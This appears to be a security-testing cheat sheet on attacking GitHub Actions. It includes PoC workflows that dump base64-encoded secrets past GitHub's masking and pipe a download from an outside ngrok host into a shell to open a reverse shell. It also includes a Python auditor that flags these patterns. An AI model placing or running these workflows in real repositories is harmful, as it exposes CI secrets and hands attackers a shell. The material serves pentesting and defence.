GitHub Actions

How well do you know GitHub Actions?
Leaking Secrets From GitHub Actions
Anyone can Access Deleted and Private Repository Data on GitHub
Vulnerable GitHub Actions Workflows Part 2: Actions That Open the Door to CI/CD Pipeline Attacks

Sensitive Files:
- .github/workflows

Checklist:
- Test code obtained from a third party

Permissions

GitHub Permission Roles

GitHub API Permission Endpoints:
Get allowed actions for a specific Bearer token
Get the list of repositories for a specific Bearer token
Get default workflow permissions for a specific organization

Note

Check if you can fork the Repository

Warning

Make sure that workflows are limited/disabled for pull requests

Warning

Make sure the default permissions for an organization are read-only.

Create New Repo

Leads to a compromised GitHub

Write Privileges

Leads to a compromised GitHub

SSH Keys

Note

Check if the user has SSH keys

GPG Keys

Note

Check if the user has GPG keys

User Token

Example Auth using a user token

Bypass Environments Protections

If you can create a new branch or push code to an existing branch, you can run a GitHub Action that interacts with all branches, including the protected branch.

PoC GitHub Actions

List Secrets:

name: list_env
on:
  workflow_dispatch: # Launch manually
  pull_request: # Run it when a PR is created to any branch
    branches:
      - "**"
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Needs to be base64-encoded, or GitHub will replace the secret value with "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}

Reverse Shell:

name: revshell
on:
  workflow_dispatch: # Launch manually
  pull_request: # Run it when a PR is created to the master branch
    branches:
      - master
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORD}}
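
A review-side check for the patterns in the two workflows above, as an added example that is not part of the original page: it flags wildcard branch triggers, secret references, encoded environment dumps and downloads piped to a shell in files under .github/workflows. The rule names, the function names and the sample workflow (with its placeholder secret name) are assumptions made for illustration.

```python
import re
from pathlib import Path

# Constructed sample, shaped like the first workflow on this page (placeholder secret name).
SAMPLE = '''\
on:
  pull_request:
    branches:
      - "**"
  push:
    branches:
      - "**"
jobs:
  list_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_example: ${{ secrets.EXAMPLE_PASSWORD }}
'''

# Line-level heuristics for review triage; the rule names are this example's own.
RULES = [
    ("wildcard-branch-trigger", re.compile(r'^\s*-\s*["\']?\*\*["\']?\s*$')),
    ("secret-reference", re.compile(r'\$\{\{\s*secrets\.[\w-]+\s*\}\}')),
    ("env-dump-encoded", re.compile(r'\b(?:env|printenv)\b.*\|\s*(?:base64|xxd)\b')),
    ("download-piped-to-shell", re.compile(r'\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba)?sh\b')),
]

def audit_workflow(text):
    """Return (line_number, rule_id) for every rule that matches a non-comment line."""
    findings = []
    for number, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        findings.extend((number, rule) for rule, pattern in RULES if pattern.search(line))
    return findings

def audit_repo(root="."):
    """Audit every .yml/.yaml workflow file under <root>/.github/workflows."""
    results = {}
    for path in sorted(Path(root, ".github", "workflows").glob("*.y*ml")):
        findings = audit_workflow(path.read_text(encoding="utf-8"))
        if findings:
            results[str(path)] = findings
    return results

if __name__ == "__main__":
    for line_number, rule_id in audit_workflow(SAMPLE):
        print(f"line {line_number}: {rule_id}")
```

A finding is a prompt for manual review rather than proof of abuse: legitimate workflows reference secrets too, so the combination of rules firing in one file is what deserves attention.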